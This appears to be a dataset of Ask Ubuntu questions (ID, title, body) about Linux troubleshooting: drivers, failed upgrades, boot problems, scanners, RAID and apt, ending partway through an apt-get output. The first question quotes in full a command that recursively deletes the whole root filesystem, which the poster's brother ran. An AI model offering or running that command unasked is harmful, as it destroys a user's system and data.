521293	an ubuntu command bricked my sytem ?	i freshly installed ubuntu on my computer a few days ago to run an exclusive program . i finished with it , and i was about to format the drive to reinstall windows . however , my little brother wanted to run this command in terminal on it which would destroy the os , and i thought that it would not hurt since i would be formatting the drive anyway . ( it was this : sudo rm -rf -- no-preserve-root / ) [ excuse my noobiness if this command is supposed to end the world or something ] so it screwed up the os and i rebooted the pc with the windows setup usb , planning to format the drive in windows setup . however , upon restart , the monitor was not receiving any input at all . also , the hdd indicator ( or whatever the red light was ) was n't doing one thing . ( it was off , in fact . ) the fans were working and the dvd drive was , though . ( i do n't think that there is a pc speaker in there , so if you need some error codes , sorry . ) i tried switching the vga cable from the graphics card to the motherboard , but i still got no input . i tried inserting this old windows xp disc into the disc drive , but nothing showed up . mashed the delete , f12 , etc buttons but nothing happened . i then looked online and tried a suggestion to reseat the ram , but nothing changed . i 'm thinking of resetting the cmos manually but have n't gotten to it yet . ( please tell me if you were going to recommend doing so , because i do n't want to screw up the pc if i do n't have to . ) i have uefi so i may be able to use a backup chip in case the bios is corrupted . any help ? feel free to ask me stuff . also , thanks to ubuntu for locking down tags so no one will find my post !
521294	why does my nvidia x server settings look wrong ?	mine looks like like this : but i think it should look like this :
521295	canon printer driver mg2900 series	do you know if there will be a driver created for the canon mg2900 series , or if there is a driver that is compatible with the mg2920 printer ? i have tried the mg2100 series and the mg5100 series but neither seem to work . since it is a newer printer , i just thought that maybe the driver has not been completed for linux yet .
521298	wallch startup does n't work	i 've installed wallch from the apt . simply adding an image to the queue and setting it as the background works , work very good in ubuntu gnome desktop , but do n't work in cairo dock desktop , any thoughts on why this can happen ?
521300	image viewer , full screen : cover instead of contain	i have a 16:9 screen on my laptop and i shot 4:3 pictures . whenever i look at one of these 4:3 pictures in full screen with the gnome image viewer , the image is contained vertically and centered horizontally , which displays black bars on the left and right side of the picture . could the picture be instead contained horizontally ( not displaying black bars ) , at the cost of actually cropping the top and bottom edge of the picture ?
521303	play audio on ubuntu core !	i installed ubuntu core 14.04 amd 64 . now i want to play an audio ! what exactly should be installed ? ! ( i got this message on webkitgtk : jack server is not running or can not be started ) i got this by run `` lshw -short '' command : h/w path device class description ================================================= system virtualbox ( ) /0 bus virtualbox /0/0 memory 128kib bios /0/1 memory 490mib system memory /0/2 processor intel ( r ) core ( tm ) i5 cpu m 460 @ 2.53ghz /0/100 bridge 440fx - 82441fx pmc [ natoma ] /0/100/1 bridge 82371sb piix3 isa [ natoma/triton ii ] /0/100/1.1 storage 82371ab/eb/mb piix4 ide /0/100/2 display virtualbox graphics adapter /0/100/3 eth0 network 82540em gigabit ethernet controller /0/100/4 generic virtualbox guest service /0/100/5 multimedia 82801aa ac'97 audio controller /0/100/6 bus keylargo/intrepid usb /0/100/7 bridge 82371ab/eb/mb piix4 acpi /0/100/b bus 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller /0/3 scsi0 storage /0/3/0.0.0 /dev/sda disk 10gb vbox harddisk /0/3/0.0.0/1 /dev/sda1 volume 3812mib ext4 volume /0/4 scsi1 storage /0/4/0.0.0 /dev/cdrom disk dvd reader
521304	lubuntu desktop manager not found	i am having problems managing my desktop manager with lubuntu . when i try to enter `` desktop preferences '' i receive the message `` error : desktop manager is not active '' . i tried playing with lxsession configure with no success . as a matter of facts , i made things worse , i deleted coreapplication/desktopmanager and do n't remember the default . ( ca n't find it anywhere online ) now i do n't have a desktop at all . any help would be appreciated . thank you .
521305	documentscanner	i 'm looking for a fast and good supported document scanner for ubuntu . i read a lot about fujitsu scansnap ix500 , which should be a good scanner and more or less well supported by sane . any suggestion are welcome as long as they are not to expensive ( < 450âź ) , have a adf , are fast ( > 20 page/minute ) and , are supported by sane . thanks
521307	two gnome panels at the top of the screen	i have two gnome panels on the top of my screen , was trying to add another monitor and this happened . how do i move the panel back to the bottom of the screen ?
521310	problem is upgrading to ubuntu 13.04	i am fairly new to the linux world . i was trying to update from 12.10 to 13.04 and when i try to run software updater i got this error message saying : failed to download repository information here is the detailed of the error message : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/main/binary-amd64/packages 404 not found [ ip : 91.189.92.201 80 ] , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/restricted/binary-amd64/packages 404 not found [ ip : 91.189.92.201 80 ] any help would be appreciated
521313	system-installation automatically directed to burning to a disk on e drive	when i download ubuntu , i am automatically directed to burning to a disk on e drive . can i use usb ? how can i change this ?
521319	need a live cd to boot to ram	i created a live cd using uck and want it to boot to ram by default . how can i do this ? i know i can hit f6 while booting and insert toram=yes , but like i mentioned i want this to be setup by default . thanks in advance . also i am a rookie when it comes to setting up ubuntu so more detailed instructions are needed .
521323	ubuntu 14.04 wifi disconnect every 1-20 minutes	i have recently upgraded to ubuntu 14.04 lts ( from 12.04 ) and my wifi keeps dropping out constantly between 1-20min . i have tried to search around and follow some advice found on forums ( eg disabling n mode ) but have had no luck . i 'm fairly new to ubuntu - please help . wifi info can be found here : http : //pastebin.ubuntu.com/8285899/
521326	what is `` *** buffer overflow detected *** : ./enc2ly terminated '' caused by ?	please define the error/ problem with enc2ly jim @ fedora : /usr/local/bin $ ./enc2ly '/home/jim/music/enc/ff-marchingbandencore /ff-4marchingband.enc ' == > /home/jim/music/enc/ff-marchingbandencore/ff-4marchingband.enc *** buffer overflow detected *** : ./enc2ly terminated ======= backtrace : ========= /lib/x86_64-linux-gnu/libc.so.6 ( +0x741df ) [ 0x7f3c31bbc1df ] /lib/x86_64-linux-gnu/libc.so.6 ( __fortify_fail+0x5c ) [ 0x7f3c31c53bac ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x10aa70 ) [ 0x7f3c31c52a70 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x109f79 ) [ 0x7f3c31c51f79 ] /lib/x86_64-linux-gnu/libc.so.6 ( _io_default_xsputn+0xbc ) [ 0x7f3c31bc455c ] /lib/x86_64-linux-gnu/libc.so.6 ( _io_vfprintf+0x1cd5 ) [ 0x7f3c31b93c85 ] /lib/x86_64-linux-gnu/libc.so.6 ( __vsprintf_chk+0x84 ) [ 0x7f3c31c52004 ] /lib/x86_64-linux-gnu/libc.so.6 ( __sprintf_chk+0x7d ) [ 0x7f3c31c51f5d ] ./enc2ly [ 0x4051fa ] ./enc2ly [ 0x405eba ] ./enc2ly [ 0x40745c ] ./enc2ly [ 0x4015cc ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7f3c31b69ec5 ] ./enc2ly [ 0x401969 ] ======= memory map : ======== 00400000-0040d000 r-xp 00000000 fc:00 12716445 /usr/local /bin/enc2ly 0060c000-0060d000 r -- p 0000c000 fc:00 12716445 /usr/local /bin/enc2ly 0060d000-0060e000 rw-p 0000d000 fc:00 12716445 /usr/local/bin/enc2ly 0060e000-0060f000 rw-p 00000000 00:00 0 01a8c000-01c5a000 rw-p 00000000 00:00 0 [ heap ] 7f3c31248000-7f3c3125e000 r-xp 00000000 fc:00 42471288 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f3c3125e000-7f3c3145d000 -- -p 00016000 fc:00 42471288 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f3c3145d000-7f3c3145e000 rw-p 00015000 fc:00 42471288 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f3c31460000-7f3c31b42000 r -- p 00000000 fc:00 12327432 /usr/lib/locale/locale-archive 7f3c31b48000-7f3c31d04000 r-xp 00000000 fc:00 42467431 /lib/x86_64-linux-gnu/libc-2.19.so 7f3c31d04000-7f3c31f03000 -- -p 001bc000 fc:00 42467431 /lib/x86_64-linux-gnu/libc-2.19.so 7f3c31f03000-7f3c31f07000 r -- p 001bb000 fc:00 42467431 /lib/x86_64-linux-gnu/libc-2.19.so 7f3c31f07000-7f3c31f09000 rw-p 001bf000 fc:00 42467431 /lib/x86_64-linux-gnu/libc-2.19.so 7f3c31f09000-7f3c31f0e000 rw-p 00000000 00:00 0 7f3c31f10000-7f3c32015000 r-xp 00000000 fc:00 42467427 /lib/x86_64-linux-gnu/libm-2.19.so 7f3c32015000-7f3c32214000 -- -p 00105000 fc:00 42467427 /lib/x86_64-linux-gnu/libm-2.19.so 7f3c32214000-7f3c32215000 r -- p 00104000 fc:00 42467427 /lib/x86_64-linux-gnu/libm-2.19.so 7f3c32215000-7f3c32216000 rw-p 00105000 fc:00 42467427 /lib/x86_64-linux-gnu/libm-2.19.so 7f3c32218000-7f3c3223b000 r-xp 00000000 fc:00 42467419 /lib/x86_64-linux-gnu/ld-2.19.so 7f3c32428000-7f3c3242f000 r -- s 00000000 fc:00 12719588 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache 7f3c32430000-7f3c32431000 r -- p 00000000 fc:00 12853378 /usr/local/share/locale/en_us/lc_messages/enc2ly.mo 7f3c32437000-7f3c3243a000 rw-p 00000000 00:00 0 7f3c3243a000-7f3c3243b000 r -- p 00022000 fc:00 42467419 /lib/x86_64-linux-gnu/ld-2.19.so 7f3c3243b000-7f3c3243c000 rw-p 00023000 fc:00 42467419 /lib/x86_64-linux-gnu/ld-2.19.so 7f3c3243c000-7f3c3243f000 rw-p 00000000 00:00 0 7f3c3243f000-7f3c32442000 rw-p 00000000 00:00 0 7fffd204e000-7fffd206f000 rw-p 00000000 00:00 0 [ stack ] 7fffd2188000-7fffd218a000 r-xp 00000000 00:00 0 [ vdso ] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [ vsyscall ] aborted ( core dumped )
521327	windows not detected . os fails to boot	i have seen very similar topics and some solutions throughout the website . but i think none of the questions are asked along with enough details . so here i go . i wanted to install ubuntu 14.04.1 lts alongside with my windows 8.1 . when i got to the installation type , i had a message saying `` there is no operating system detected '' which i realized later on surfing the web about my problem ( i 'll get to the point soon ) . so i was like `` i guess i have to check 'something else ' , since it is the only option that does n't erase information from my hdd '' . so i checked the radiobox and stepped into next step which is about resizing and partitioning just to see what appears ( i did n't really want to install ubuntu before backing up windows ) . like i said , i was curious and wanted to see what i was going to see . http : //i.stack.imgur.com/v0s4a.png above link is a picture of the step that caused all the problems in my opinion . i changed the sizes , tried to figure out the way it works , played with values and stuff , but , i never hit the `` install now '' button . i said `` okay it seems fair enough , i will install ubuntu tomorrow after a little bit of research '' . i press quit and i want to get back to windows 8.1 . i take out the ubuntu dvd and reboot the computer . this is where it gets messy . i am facing a problem where i get an error message says `` efi network 0 ipv4 and bla bla . '' so i start doing some research . i read all the related topics and the solutions were similar . change the bios settings , disable uefi mode , enable security boot , disable security boot , check if hdd is detected or not and such . i tried everything . i spent 2 days trying to find right solution . so , clarify things , this is a simple explanation of what i think . 1-i think i am having this problem because i changed the way hdd works and tried to partition it without having that much of knowledge about it . clearly , even though you do n't press install , it actually partitions the hard drive . 2-i tried every possible solution , i still ca n't boot the pc . here are the solutions i have tried so far : -change bios boot settings ( enable/disable uefi , legacy support ) . when i boot uefi enabled , i get `` efi network 0 ipv4 , no bootable device ... '' kinda problem . when i boot legacy support enabled , it says `` no bootable device found , press any key to continue '' . -check if hdd is detected ( yes it is ) -start on safe mode ( it fails to boot ) what i think is this : i think there are 2 possible solutions left to try . first , take out your hdd , plug into any other computer , back up your information , then install windows again . my second possible solution is to try booting windows with an os-installed usb . so would i be able to boot the pc if i try this ? my question is : what is the real problem ? not having windows detected or having a broken hdd since i tried to partition it with no knowledge . another question is : is there any hope that i can save my hdd without having to erasing all the information i have . is it possible to save informations from it ? my computer is a lenovo y410p . so it has a security start button right by the fan . i hit that button and choose `` system recovery '' . still fails to boot . additional important informations i forgot to mention : -i said i did n't hit the install now button . actually i did . but it failed giving me an error message saying something like this `` mount point ca n't be the same bla bla '' . i am not quite sure what the message was but it had something to do with mounting . simple put , it never started installing . -i am able to boot my pc using `` try ubuntu without installing it '' when i have the dvd placed in the driver . -when i go to my system details on ubuntu , i see this : http : //i.stack.imgur.com/8evt2.png -after having no hope at all and realizing that i had this problem because of partitioning , i went to installation again . i thought if i had a good partition scheme , it would work . so i found a scheme and applied it on drivers . this time i hit the install now again , it asks me where i am from and which language i speak , showing a map of the world . so i see , it works , so i cancel installation before even starting it again . -having tried everything i could try ( possibly i made it worse trying to fix it myself because of my curiosity ) i thought it is best to seek assistance . -if there is no hope left for me to save information from my hdd , i will just have to install ubuntu and forget about windows . i am deeply sorry , for giving you so many details . probably , 50 % of the information i gave you were either pointless or not needed . i tried to be clear as much as i can . even though i tried my best , i know it is still confusing and you will be asking tons of questions as you try to realize the process . well , please ask . i just want to save my information from my hdd . i do n't really care about windows . thank you all in advance .
521328	ubuntu stuck logging in	whenever i try to login to ubuntu i enter my password it just kinda stays there with that white loading circle right where i entered my password . edit : i can login through the command line but not through the gui and i can login as guest .
521330	can i remove ppa without affecting software ?	i installed a ppa for the very first time according to instructions on here . i achieved my goal ( needed to install an application by the name solaar ) , and now i wonder if i can uninstall the ppa without it affecting the installed software ( solaar ) ? i manually added ppa through software center > edit > software sources and now there are three adresses/lines ( or what to call them ) saved/logged . what i am basically asking is ; after the desired install is done , is the ppa disposable ? i am running ubuntu 14,4 lts .
521333	dd not working correctly ?	i 'm not too familiar with linux so please forgive the ignorance . i 'm trying to dump a file to a virtual floppy disk using the command : dd if=a.out of=image bs=1024 count=1 conv=notrunc it creates the image file with the exact same size of a.out ( 1kb ) . however on my friend 's laptop , his image file is 1.5mb . his is correct ( as said by my professor ) however mine is n't . i even tried with his a.out file just to check and it produced the same , wrong results . any input on why this is and how to fix it ? thank you
521334	epson perfection v33 not working after installing trusty tahr 14.04.1	already checked this link : epson v33 perfection not working with 14.04 it did not answer my problem . i followed the advice given and it still xsane will still not launch . unlike the poster of the previous question , not even `` simple scan '' works . i get this error from xsane : failed to open device 'epkowa : interpreter:006:007 ' : error during device i/o .
521335	firefox issues on ubuntu	i am running ubuntu 12.04 lts , and i have several problems using firefox 32.0 on it : when playing youtube videos , the browser will crash making a reboot necessary sometimes when i close the application , i get a prompt window asking me to send in a crash report ( even though the program did not crash but was exited normally ) any guidance will be appreciated .
521336	latest hwe not supported ?	i was previously running 12.04 , but installed the hwe update since mine was expiring . upon reboot , at the login screen , it played the default drum sound about 10 times in a row really quickly and then hung . after that i could n't get passed the splash screen . i was debating upgrading to 14.04 anyway , so i wiped the drive ( it 's all backed up on my nas ) and tried a fresh install . now , the liveusb crashes at the splash screen . i assume it 's an issue with the graphics stack , but that stuff is a little over my head . liveusb works fine with 10.04 , but not with 14.04 . both are the amd 64bit versions . i have n't tried any other versions . i have a gigabyte motherboard and am just using the on-board graphics card . any ideas what the problem may be ?
521338	fujitsu fi-4220c2 sane setup	i am trying to setup a fujitsu fi-4220c2 on ubuntu 14.04. lsusb list the device , so i am assumning the kernel driver is loaded successfully . the scanner is supported under sane , and the fujitsu.cong file has the correct settings . lsusb bus 002 device 004 : id 8087:07da intel corp . bus 002 device 006 : id 04c5:10af fujitsu , ltd fi-4220c2 bus 002 device 003 : id 2548:1002 bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub /etc/sane.d/fujitsu.conf fi-4x20c2 usb 0x04c5 0x10ae usb 0x04c5 0x10af however sane-find-scanner does not find the scanner . any have any ideas ? more on my plight , jus tin case someone can use this information . 1- needed to add the user to the scanner group . sudo adduser username scanner 2- needed to modify /etc/sane.d/saned/conf and add the following run=yes 192.168.1.0/24 this allowed me to see the scanner with `` scanimage -l '' which produce the following output 'scanimage -l' device hpaio : /net/officejet_6600 ? zc=hp1bd777 is a hewlett-packard officejet_6600 all-in-one device fujitsu : fi-4220c2dj:100742 is a fujitsu fi-4220c2dj scanner i was also able to scan an image with : 'scanimage -d fujitsu : fi-4220c2dj:100742 -- format tiff -l 0 -t 0 -x 215 -y 297 > outfile.tiff' although , a pdf scan was corrupted , a tiff scan was successful . i still cant get sane-find-scanner to located the scanner .
521341	how to stop my trackpad from driving me crazy ?	using ubuntu 14.04 , very frequently when i use two-finger scroll it switches between programs ( alt+tab equivalent ) and this is super annoying ! how can i keep two-finger scroll but not have it switching programs/windows on me all the time ? ? ( further info : i am using an asus x501a refurbished laptop with a large , button-less trackpad with the right and left click seamless but designated in the bottom ~1/2 '' of the pad area , pad size approx . 3x3 '' , i have both tap-to-click and 2-finger scroll enabled , natural scrolling is disabled , medium pointer-speed and double-click )
521343	can i debug php scripts running in apache on ubuntu ?	coming from the microsoft world , where visual studio , windows , and iis seemingly play nice together , i can attach the visual studio debugger to the iis process and debug code in play . when a web service call is made to the iis server , i can evaluate the parameters , and watch the code execute . can i do the same with php scripts running in apache on ubuntu ? i have php5 on apache2 and have installed xdebug . phpinfo ( ) seems to think this is all setup and ready , only i have no idea how to attach this debugger to the httpd process and/or which editor/ide to use to view the debugging .
521345	how do i remove sudo from my server without breaking everything ?	i am creating a test server vm , and i would like to delete the sudo executable by deleting it via apt . i know the root password , so that is not a downside . is there any problem about removing sudo from a system ? i do not care about losing the capability to run commands with sudo . i practically live as the root user . programs needed : apache2 mysql ftp
521346	install xfx hd4670 on ubuntu 14.04	i have tried lots of work around to be able to install my graphics card on ubuntu 14.04.. and i keep on re-installing ubuntu after every failure.. i just want to ask if it is possible to install xfx hd4670 on ubuntu 14.04 or if there are other ways to make it work.. thanks..
521347	can i install 14.04 on a dell xps13 ( not developer edition ) ?	i live in japan : a country where dell does not sell the xps13 developer edition . and i used to work in london where one of my friend had the xps 13 dev edition . and , of course , i really liked it . i was wondering if i can just buy a normal xps 13 and install ubuntu on my own ? would there be any extra steps or peculiarities compared to a normal pc install ? i would really like to make sure before i invest money and time in this ( i do not want to be stuck with a window entertainment laptop since i already have my wife 's macbook ) .
521348	how to make raid1 on running ubuntu 12.04	i want to make raid1 on a running linux i installed the ubuntu server 12.04 then , i installed the backuppc software . i installed the os on a hdd with 160gb of storage so , i want to put another 2 x 2tb hdds to store those backup data . so , how can i make raid1 to those 2 tb hdds ? i mean in 160 gb hdd , i installed the os device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 312498175 155998209 5 extended /dev/sda5 501760 312498175 155998208 8e linux lvm then , i put 2 more hdds namely sdb1 and sdc1 information about /dev/sdb disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000f2e02 device boot start end blocks id system /dev/sdb1 2048 3907028991 1953513472 83 linux information about /dev/sdc disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0005d662 device boot start end blocks id system /dev/sdc1 2048 3907028991 1953513472 83 linux so , my idea is that i want to save the data inside the /dev/sdb1 and want to make /dev/sdc1 as the mirror of /dev/sdb1 ( with raid1 ) so , how can i do this ?
521349	how do i install ubuntu software centre application ?	i accidentally removed the ubuntu software centre , when i was actually trying to remove my ubuntu one applications . although i do n't remember directly uninstalling the centre , i think deleting one of those packages might have triggered it . i can not look at history of application changes , as the software centre is missing . please advise on how to install , or rather reinstall , ubuntu software centre on my computer .
521350	upgrade from 12.04 to 14.04 fails and takes me to memtest screen	upgraded from 12.04 to 14.04 seemed successful ( took 3 hours ) and at the end the system prompted to restart i said okay and it takes me to a blue memtest screen . i am lost please help .
521352	old windows program running through wine fail to load library	a program called megamud is crashing when i attempt to run it with wine megamud.exe , in the terminal i 'm getting : p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory the application is telling me your ini file does not appear to be within `` chars '' sub-directory . please check that the correct ini file has been loaded and that megamud is installed properly . i 'm not sure if i 'm supposed to be ignoring the terminal error and focusing on the wine one or not . but in the past i 've installed and run this with ease on older releases of ubuntu/wine .
521353	restore ldap from machine backup files	i am looking to restore my ldap from a tar archive backup of my machine . i attempted to upgrade from 12.04 to 14.04 and it failed . thus i backed up all my files and installed 14.04 fresh . i see this link which is promising : http : //www.openldap.org/lists/openldap-software/200402/msg00560.html basically if i put all the files for ldap back and install via apt-get will that work ? /etc/ldap /var/lib/ldap thanks
521354	multiple-monitors and nvidia optimus not working after apt-get update	just recently ( late august / early september 2014 ) my multiple monitor setup and nvidia optimus is not working . i had the symptoms characterized by this bug . after setting the bios to graphics card : integrated and optimus : disabled , i was able to start ubuntu , but it would not detect my external monitor . then i uninstalled and re-installed nvidia primus . then i tried both suggestions in the bug tracker , involving : sudo apt-get install ubuntu-drivers-common=1:0.2.91.4 and sudo dpkg -i ubuntu-drivers-common_0.2.91.5_amd64.deb nvidia-common_0.2.91.5_amd64.deb ( after downloading the associated .deb 's ) , rebooted , and reset the bios to graphics card : optimus and optimus : enabled , but i can not detect the external monitor . am i missing something , or are there any suggestions on how to proceed ? i am running ubuntu 14.04 on a lenovo w520 .
521356	adding a java application to startup ( after login )	to start with , i know such a question has been asked several times , and i have been trying to do this by following the exemples i have seen . but even though several steps seem to function , the end result does not . im trying to add a gui application which requires the user to have finished logging , and it should be done programatacly since its a downloadable application and not just for my own use . i 'm currently using ubuntu 13.10 . to verify i can start my application , im trying to register a simple tray application ( taken from oracles exemple ) . i made a jar out of it , and i can execute it corretly with `` java -jar /home/raposo/tt.jar '' . the script i made for the .desktop file execute is as follows : # ! /bin/sh java -jar /home/raposo/tt.jar by using chmod +x , i can run from terminal with `` /home/raposo/tt.sh '' . i read that i should make a .desktop for this , and i placed it in /home/raposo/.config/autostart with the following content : [ desktop entry ] name=cenas exec=/home/raposo/tt.sh terminal=false icon=system-run type=application x-gnome-autostart-enabled=true startupnotify=false i tried without giving it chmod +x , and also giving it ( the .jar applicattion starts corretly by double-clicking ) . passing `` java -jar /home/raposo/tt.jar '' to `` exec '' also let 's the application start . also tried giving it delay ( x-gnome-autostart-delay=120 ) , been trying things i saw on exemples pretty much , incluiding close replics ( besides the `` exec '' ) of other .desktop that i know it works ( dropbox ) . once again , sry for a possible duplicate , but would appreciate any input on what i guess is some simple mistake on my part > < . thank you in advance , cumps edit : actually , even through trying by `` startup applications '' menu , i ca n't get it to start , using as command `` /home/raposo/tt.sh '' , `` /home/raposo/tt/ or `` java -jar /home/raposo/tt.jar ''
521360	remove ubuntu and install windows 8	i want to remove my version of ubuntu and install win 8 , but when i go through win8 installation and choose custom i found ( in the window of choosing partitions that `` windows can not installed on this drive `` this message appeared in every partition i choose ... what can i do to remove ubuntu and install win8 without loosing my own partitions ?
521361	upgrade 12.10 quantal to 14.04 tt	i am stuck in upgrade hell . i know the ideal path would be 12.10 > 13.x > 14.04 but i want to know if anyone out there has successfully upgraded to 14.04 from 12.10 ( not 12.04 - i can see stuff out there for the former sudo do-release-upgrade -d checking for a new ubuntu release no new release found $ sudo apt-get dist-upgrade -d reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ~ $ more /etc/update-manager/release-upgrades # default behavior for the release upgrader . default ] ... ... ... ... ... ... ... ... ... ... ... ..etc prompt=lts hi i agree the q has been asked in essence , several times in past but upgrade experiences across versions are individual .e , g , 10.x to 13 maybe totally different in terms of feasibility and ease compared to 12.1 to 14.x . what i am trying to find out is for this specific instance ( 12.10 to 14.x ) has someone had luck and what steps did it all.ty again karel
521364	what is the `` quality '' of a wi-fi access point ?	in debian ( including ubuntu ) you can use iwlist to scan nearby wi-fi access points . in the statistics like this : cell 01 - address : cc : b2:55 : xx : xx : xx essid : '' x '' protocol : ieee 802.11bg mode : master frequency:2.412 ghz ( channel 1 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:33 signal level:0 noise level:0 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 252ms ago there is a field called `` quality '' . i can understand what `` signal level '' means , it is rssi ( received signal strength indication ) . however , what does `` quality '' mean really ? how is it measured ? meanwhile , on my ubuntu 12.04 lts laptop , it is weird because the `` signal level '' fields of all scanned access points are 0 , so are the `` noise level '' fields . but on my raspberry pi which has raspbian , i can see `` quality '' , `` signal level '' , and `` noise level '' fields have different readings . ( this is not the primary problem , but if you know the answer please just breifly describe a little bit . )
521368	14.04 installation	i got a notification for upgarde from 12.04 ( which i was using for more than a year now ) to 14.04 - informs just a few clicks away - i opted and it failed at the end saying that .init variable error - this i do not understand - unfortunated the partition gor corrupted and i have only partition back up - do not know how to restore 2 i reformatted d : ( windows ntfs drive where 12.04 was installed earlier ) and tried to download 14.04 afreh - but installation is not going through with no clarity and i am not sure what mistake i commited - downloading multiple times and trying multiple times it was always failure i am not sure what to do now ? 9/9/14 : just now i noticed that the download from ubuntu site was azip file and it is not an installation file . i think we need to extract the files - i am not sure the guide does not contain details - wheere this zip file would be extracted and from where install command can be run ?
521369	simulate power button using command ?	when i hit the power button on my laptop ( ubuntu 14.04.1 without any modifications ) , i receive a pop window saying goodbye , what would you like to do ? lock suspend restart shutdown how can i get this screen through command-line or a script ? addition : the linked question mentions gnome-session-quit but this does not produce the overlay specified above : the accepted answer performs the desired behavior .
521371	pause playback when headphones are disconnected	how is it possible to pause the playback of vlc when my headphones are plugged out ? i can mute the speakers via alsa , but i want to use the plug trigger to stop the playback , as it is usual in smartphones .
521372	canon lbp 2900 not working on ubuntu 14.04 error message devicepath	i did the following : downloaded and installed capt drivers v 2.6 with dpkg . installed portreserve , gsfonts , gsfonts-other , gsfonts-x11 with apt-get . ran sudo service cups restart . then sudo /usr/sbin/lpadmin -p lbp2900 -m cncupslbp2900captk.ppd -v ccp : //localhost:59787 -e ran sudo /usr/sbin/ccpdadmin -p lbp2900 -o /dev/usb/lp0 ran sudo service ccpd start ran sudo service ccpd status ran captstatusui -p lbp290 and got an error message in a window with the title lbp 2900 : check the devicepath of /etc/ccpd.conf the devicepath line in /etc/ccpd.conf says : /dev/usb/lp0 when i checked /dev/usb , i found only lp1 there , so i changed the entry in the devicepath line to /dev/usb/lp1 . no difference to the results . no printing done . can anyone help ?
521375	my hp pavilion g6 wo n't resume from suspend and i 'm running 14.04	during inactivity i can reactivate it and resume as normal , but if i manually select to go into suspend mode or if i close the lid then it wo n't come out of suspend mode . the computer will still stay on but pressing any keys wo n't bring it out of suspend mode so i have to do a hard shut down .
521376	some fonts are unreadable	i have a lot of difficulty reading text for certain fonts . like the following picture : i have mscorefonts installed . any reason why this is the case ?
521378	password recovery while os is running	when i start my pc , then ubuntu is not asking for password . but when i want to install any software , at that time , it is asking for password , therefore i lost my password . how to recover my password ?
521379	apt-get want to remove all my packages	my apt-get thinks everything including my xserver gdm and other vital softwares are unnecessary . the following is the output . when i once ran upgrade it did remove evrything and i had to reinstall my os . root @ blackdragon : /home/auditor # sudo apt-get install apache2 php5 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : aisleriot ant ant-optional argyll at-spi2-core baobab browser-plugin-gnash ca-certificates-java caribou caribou-antler cheese dconf-tools default-jre default-jre-headless empathy empathy-common espeak-data file-roller finger fonts-cantarell fonts-lyx fonts-opensymbol fonts-sil-gentium fonts-sil-gentium-basic fonts-stix gcalctool gdebi gdm3 gedit gedit-common gedit-plugins gir1.2-atspi-2.0 gir1.2-gdata-0.0 gir1.2-gnomekeyring-1.0 gir1.2-goa-1.0 gir1.2-gtop-2.0 gir1.2-gucharmap-2.90 gir1.2-javascriptcoregtk-3.0 gir1.2-rb-3.0 gir1.2-tracker-0.14 gir1.2-webkit-3.0 gir1.2-wnck-3.0 glchess glines gnash gnash-common gnect gnibbles gnobots2 gnome-backgrounds gnome-color-manager gnome-dictionary gnome-disk-utility gnome-documents gnome-font-viewer gnome-games gnome-games-data gnome-games-extra-data gnome-icon-theme-extras gnome-mag gnome-nettool gnome-orca gnome-packagekit gnome-packagekit-data gnome-screenshot gnome-shell-extensions gnome-sudoku gnome-system-log gnome-tweak-tool gnome-video-effects gnomine gnotravex gnotski gnuchess gnuchess-book grilo-plugins-0.1 gtali gucharmap guile-2.0-libs hamster-applet hyphen-en-us iagno icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-netx-common inkscape iputils-tracepath java-common libapache-pom-java libatk-adaptor libatk-adaptor-data libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatspi1.0-0 libatspi2.0-0 libavahi-gobject0 libavahi-ui-gtk3-0 libblas3gf libbonoboui2-0 libbonoboui2-common libboost-program-options1.49.0 libboost-thread1.49.0 libbrlapi0.5 libcaribou-gtk-module libcaribou-gtk3-module libcmis-0.2-0 libcolamd2.7.1 libcolorblind0 libcommons-beanutils-java libcommons-collections3-java libcommons-compress-java libcommons-digester-java libcommons-logging-java libcommons-parent-java libdb-java libdb-je-java libdb5.1-java libdb5.1-java-jni libdee-1.0-4 libdiscid0 libdmapsharing-3.0-2 libdotconf1.0 libespeak1 libexttextcat-data libexttextcat0 libfs6 libgail-common libgdict-1.0-6 libgdict-common libgdu-gtk0 libgeocode-glib0 libgexiv2-1 libglade2-0 libgnome-mag2 libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common 